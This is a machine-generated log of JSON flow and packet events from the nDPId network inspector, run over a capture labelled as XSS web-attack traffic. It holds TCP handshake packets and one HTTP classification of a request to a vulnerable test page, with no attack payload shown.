+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8572,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":605,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348001148,"flow_last_seen":1499348001148,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348001148,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34926,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8572,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":605,"flow_packet_id":1,"flow_last_seen":1499348001148,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348001148,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8pkpAAD4GH4asEAABwKgKMohuAFDUG39mAAAAAKACchCoWgAAAgQFtAQCCAoBPNksAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8573,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":605,"flow_packet_id":2,"flow_last_seen":1499348001148,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348001148,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiG4I9+h41Bt\/Z6AScSAJQwAAAgQFtAQCCAoD5qqgATzZLAEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8574,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":605,"flow_packet_id":3,"flow_last_seen":1499348001148,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348001148,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0pktAAD4GH42sEAABwKgKMohuAFDUG39nCPfoeYAQAOWoSgAAAQEICgE82SwD5qqg"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8581,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":606,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348002450,"flow_last_seen":1499348002450,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348002450,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34940,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8581,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":606,"flow_packet_id":1,"flow_last_seen":1499348002450,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348002450,"pkt":"ABm5CmnxAMGxFOsxCABFAAA80ydAAD4G8qisEAABwKgKMoh8AFCQawlWAAAAAKACchBgyAAAAgQFtAQCCAoBPNpxAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8582,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":606,"flow_packet_id":2,"flow_last_seen":1499348002450,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348002450,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiHx5OBm2kGsJV6AScSAe7QAAAgQFtAQCCAoD5qvlATzacQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8583,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":606,"flow_packet_id":3,"flow_last_seen":1499348002450,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348002450,"pkt":"ABm5CmnxAMGxFOsxCABFAAA00yhAAD4G8q+sEAABwKgKMoh8AFCQawlXeTgZt4AQAOW98wAAAQEICgE82nID5qvl"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8593,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":607,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348003742,"flow_last_seen":1499348003742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348003742,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34954,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8593,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":607,"flow_packet_id":1,"flow_last_seen":1499348003742,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348003742,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Q\/NAAD4Ggd2sEAABwKgKMoiKAFCK7JhGAAAAAKACchDWBAAAAgQFtAQCCAoBPNu1AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8594,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":607,"flow_packet_id":2,"flow_last_seen":1499348003742,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348003742,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiIrxrFQGiuyYR6AScSDgIAAAAgQFtAQCCAoD5q0pATzbtQEDAwc="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8595,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":607,"flow_packet_id":3,"flow_last_seen":1499348003743,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348003743,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Q\/RAAD4GgeSsEAABwKgKMoiKAFCK7JhH8axUB4AQAOV\/KAAAAQEICgE827UD5q0p"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8611,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":608,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348006334,"flow_last_seen":1499348006334,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348006334,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34980,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8611,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":608,"flow_packet_id":1,"flow_last_seen":1499348006334,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348006334,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8NJlAAD4GkTesEAABwKgKMoikAFAqsOqkAAAAAKACchDhQAAAAgQFtAQCCAoBPN49AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8612,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":608,"flow_packet_id":2,"flow_last_seen":1499348006334,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348006334,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiKQqwf7AKrDqpaAScSAFBgAAAgQFtAQCCAoD5q+xATzePQEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8613,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":608,"flow_packet_id":3,"flow_last_seen":1499348006335,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348006335,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0NJpAAD4GkT6sEAABwKgKMoikAFAqsOqlKsH+wYAQAOWkDQAAAQEICgE83j0D5q+x"} +00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8623,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":606,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348002450,"flow_last_seen":1499348007347,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1499348007347,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34940,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8627,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":609,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348007599,"flow_last_seen":1499348007599,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348007599,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34994,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8627,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":609,"flow_packet_id":1,"flow_last_seen":1499348007599,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348007599,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8+WFAAD4GzG6sEAABwKgKMoiyAFBEayYYAAAAAKACchCKyAAAAgQFtAQCCAoBPN95AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8628,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":609,"flow_packet_id":2,"flow_last_seen":1499348007599,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348007599,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiLJr5HteRGsmGaAScSDvkAAAAgQFtAQCCAoD5rDtATzfeQEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8629,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":609,"flow_packet_id":3,"flow_last_seen":1499348007600,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348007600,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0+WJAAD4GzHWsEAABwKgKMoiyAFBEayYZa+R7X4AQAOWOmAAAAQEICgE833kD5rDt"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8642,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":534,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347874737,"flow_last_seen":1499347879867,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348008904,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33608,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8642,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":534,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347874737,"flow_last_seen":1499347879867,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348008904,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33608,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8642,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":535,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347877292,"flow_last_seen":1499347882869,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348008904,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33634,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8642,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":535,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347877292,"flow_last_seen":1499347882869,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348008904,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33634,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8642,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":536,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347878568,"flow_last_seen":1499347883869,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348008904,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33648,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8642,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":536,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347878568,"flow_last_seen":1499347883869,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348008904,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33648,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8642,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":537,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347881141,"flow_last_seen":1499347886869,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348008904,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33674,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8642,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":537,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347881141,"flow_last_seen":1499347886869,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348008904,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33674,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8642,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":538,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347882404,"flow_last_seen":1499347887870,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348008904,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33688,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8642,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":538,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347882404,"flow_last_seen":1499347887870,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348008904,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33688,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8642,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":539,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347883693,"flow_last_seen":1499347888870,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348008904,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33702,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8642,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":539,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347883693,"flow_last_seen":1499347888870,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348008904,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33702,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8645,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":610,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348010145,"flow_last_seen":1499348010145,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348010145,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35020,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8645,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":610,"flow_packet_id":1,"flow_last_seen":1499348010145,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348010145,"pkt":"ABm5CmnxAMGxFOsxCABFAAA81alAAD4G8CasEAABwKgKMojMAFACvDRcAAAAAKACchC7nQAAAgQFtAQCCAoBPOH1AAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8646,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":610,"flow_packet_id":2,"flow_last_seen":1499348010145,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348010145,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiMxKQ6iIArw0XaAScSASYQAAAgQFtAQCCAoD5rNpATzh9QEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8647,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":610,"flow_packet_id":3,"flow_last_seen":1499348010146,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348010146,"pkt":"ABm5CmnxAMGxFOsxCABFAAA01apAAD4G8C2sEAABwKgKMojMAFACvDRdSkOoiYAQAOWxZwAAAQEICgE84fYD5rNp"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8654,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":611,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348011433,"flow_last_seen":1499348011433,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348011433,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35034,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8654,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":611,"flow_packet_id":1,"flow_last_seen":1499348011433,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348011433,"pkt":"ABm5CmnxAMGxFOsxCABFAAA89\/VAAD4GzdqsEAABwKgKMojaAFB2oBTCAAAAAKACchBmAwAAAgQFtAQCCAoBPOM3AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8655,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":611,"flow_packet_id":2,"flow_last_seen":1499348011433,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348011433,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiNplHDbhdqAUw6AScSASUwAAAgQFtAQCCAoD5rSrATzjNwEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8656,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":611,"flow_packet_id":3,"flow_last_seen":1499348011433,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348011433,"pkt":"ABm5CmnxAMGxFOsxCABFAAA09\/ZAAD4GzeGsEAABwKgKMojaAFB2oBTDZRw24oAQAOWxWgAAAQEICgE84zcD5rSr"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8666,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":612,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348012728,"flow_last_seen":1499348012728,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348012728,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35048,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8666,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":612,"flow_packet_id":1,"flow_last_seen":1499348012728,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348012728,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8MbdAAD4GlBmsEAABwKgKMojoAFBoxNXMAAAAAKACchCxggAAAgQFtAQCCAoBPOR7AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8667,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":612,"flow_packet_id":2,"flow_last_seen":1499348012728,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348012728,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiOhwV55UaMTVzaAScSDp3wAAAgQFtAQCCAoD5rXvATzkewEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8668,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":612,"flow_packet_id":3,"flow_last_seen":1499348012729,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348012729,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0MbhAAD4GlCCsEAABwKgKMojoAFBoxNXNcFeeVYAQAOWI5wAAAQEICgE85HsD5rXv"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8684,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":613,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348015250,"flow_last_seen":1499348015250,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348015250,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35074,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 